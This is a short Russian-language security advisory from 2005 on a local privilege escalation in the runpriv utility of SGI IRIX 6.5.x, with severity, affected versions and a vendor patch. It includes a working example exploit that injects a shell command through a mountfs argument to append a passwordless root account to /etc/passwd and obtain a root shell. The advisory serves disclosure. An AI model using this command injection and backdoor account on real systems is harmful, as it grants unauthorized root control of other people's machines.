Security Lab

Повышение привилегий в SGI IRIX в утилите runpriv'

Дата публикации:14.10.2005
Всего просмотров:963
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная
Воздействие: Повышение привилегий
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SGI IRIX 6.5.x
Уязвимые версии: SGI IRIX 6.5.22, 6.5.27 и 6.5.28

Описание:
Уязвимость в утилите runpriv позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует в утилите runpriv из-за небезопасного выполнения команд после проверки привилегий пользователя. Локальный пользователь с правами на запуск приложений из директории /usr/sysadm/privbin, может выполнить произвольные команды на системе с привилегиями пользователя root. Пример для пользователя с правами на запуск утилиты mountfs:

/usr/sysadm/bin/runpriv mountfs -s test -d / -o \|
"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su"

URL производителя: www.sgi.com

Решение: Установите исправление 7004 с сайта производителя.

Источник:

Ссылки: SGI IRIX runpriv Design Error Vulnerability